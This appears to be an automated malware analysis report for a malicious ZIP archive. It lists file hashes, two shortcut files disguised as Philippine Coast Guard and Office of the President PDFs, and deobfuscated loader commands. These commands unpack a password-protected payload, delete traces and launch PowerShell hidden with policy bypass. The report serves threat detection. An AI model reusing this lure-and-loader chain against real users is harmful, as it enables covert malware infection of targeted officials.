Malicious

8e130c2604516ccd4bcba72cc6549649

ZIP Archive | MD5: 8e130c2604516ccd4bcba72cc6549649 | Size: 459.84 KB | application/zip


Characteristics
Hash | Hash Value
MD5 | 8e130c2604516ccd4bcba72cc6549649
SHA1 | d70bad36a4060f93a3c5c9092bbf299c463a1451
SHA256 | 495cb43f3c2e3abd298a3282b1cc5da4d6c0d84b73bd3efcc44173cca950273c
SHA384 | cd7c3e7f629c339ea855e1f8b497f20b012166d54657a39cffab3a198f7b19bf29063b80034d12637454a8c474c5d34f
SHA512 | a04d8a2736476a0066aece17ae19b32c838b22ee96ef359320cb775342d41d53c4549f1cda180461e7c8c02275959489be784a514ea63f8aba751474333221f2
SSDeep | 12288:i1x8DZXQN+IcPgrX5uSWEsmhKgHnqDSgz6Bnas:i1xMrIcPglRXagHqD6BV
TLSH | 07A4239724731167FEB1FCA77CCC5A210FF484E973AE196B022AE85C45076A786CB05E

File Structure
124th_Anniversary_of_the_Philippine_Coast_Guard_Event_Summary_and_Feedback_Request_Office_of_the_Appointments_Secretary_OP_23102025.pdf.lnk | Malicious
[Lnk Summary] | Malicious
PCG_124th_Anniversary_Ceremonial_Report_and_Documentation_for_Review_and_Comments_Before_11AM_Deadline_Office_of_the_President_23102025.pdf.lnk | Malicious
[Lnk Summary] | Malicious
__MACOSX | Malicious
[PowerShell Command] | Malicious
[Deobfuscated PS] | Malicious
[Deobfuscated PS] | Malicious
[Deobfuscated PS] | Malicious
[Deobfuscated PS] | Malicious

Artefacts
Name
Value
LNK: Command Execution

cmd.exe /b /c "@echo off && for %I in (*-Archive.zip) do tar.exe -xf "%I" && "__MACOSX\ZoomWorkspace.bat" || "__MACOSX\ZoomWorkspace.bat""

LNK: Command Execution

cmd.exe /b /c "@echo off && tar.exe -xf "*-Archive.zip" && "__MACOSX\ZoomWorkspace.bat" || "__MACOSX\ZoomWorkspace.bat""

Deobfuscated PowerShell

%exf% exit /b "%errorlevel%" [Unmanaged(ErrorStatementAst)] if exist "%z64%" "%z64%" "x" -psuu9cskRIQjsBxYtr9TH -o "%drp%\" -y "%rsz%" [Unmanaged(ErrorStatementAst)] if exist "%exf%" (Remove-Item "/s" "/q" "/a" "/f" "%rsz%") "powershell" -WindowStyle "hidden" -ep "Bypass" -nop "%exf%" exit /b "%errorlevel%" [Unmanaged(ErrorStatementAst)] if exist "%RAR32%" "%RAR32%" "x" -hpsuu9cskRIQjsBxYtr9TH -y "%rsz%" "%drp%\" [Unmanaged(ErrorStatementAst)] if exist "%exf%" (Remove-Item "/s" "/q" "/a" "/f" "%rsz%") "powershell" -WindowStyle "hidden" -ep "Bypass" -nop "%exf%" exit /b "%errorlevel%" [Unmanaged(ErrorStatementAst)] if exist "%z32%" "%z32%" "x" -psuu9cskRIQjsBxYtr9TH "-o%drp%\" -y "%rsz%" [Unmanaged(ErrorStatementAst)] if exist "%exf%" (Remove-Item "/s" "/q" "/a" "/f" "%rsz%") "powershell" -WindowStyle "hidden" -ep "Bypass" -nop "%exf%" exit /b "%errorlevel%" endlocal

Deobfuscated PowerShell

%exf% exit /b "%errorlevel%" [Unmanaged(ErrorStatementAst)] if exist "%RAR32%" "%RAR32%" "x" -hpsuu9cskRIQjsBxYtr9TH -y "%rsz%" "%drp%\" [Unmanaged(ErrorStatementAst)] if exist "%exf%" (Remove-Item "/s" "/q" "/a" "/f" "%rsz%") "powershell" -WindowStyle "hidden" -ep "Bypass" -nop "%exf%" exit /b "%errorlevel%" [Unmanaged(ErrorStatementAst)] if exist "%z32%" "%z32%" "x" -psuu9cskRIQjsBxYtr9TH "-o%drp%\" -y "%rsz%" [Unmanaged(ErrorStatementAst)] if exist "%exf%" (Remove-Item "/s" "/q" "/a" "/f" "%rsz%") "powershell" -WindowStyle "hidden" -ep "Bypass" -nop "%exf%" exit /b "%errorlevel%" endlocal

Deobfuscated PowerShell

%exf% exit /b "%errorlevel%" [Unmanaged(ErrorStatementAst)] if exist "%z32%" "%z32%" "x" -psuu9cskRIQjsBxYtr9TH "-o%drp%\" -y "%rsz%" [Unmanaged(ErrorStatementAst)] if exist "%exf%" (Remove-Item "/s" "/q" "/a" "/f" "%rsz%") "powershell" -WindowStyle "hidden" -ep "Bypass" -nop "%exf%" exit /b "%errorlevel%" endlocal

Deobfuscated PowerShell

%exf% exit /b "%errorlevel%" endlocal
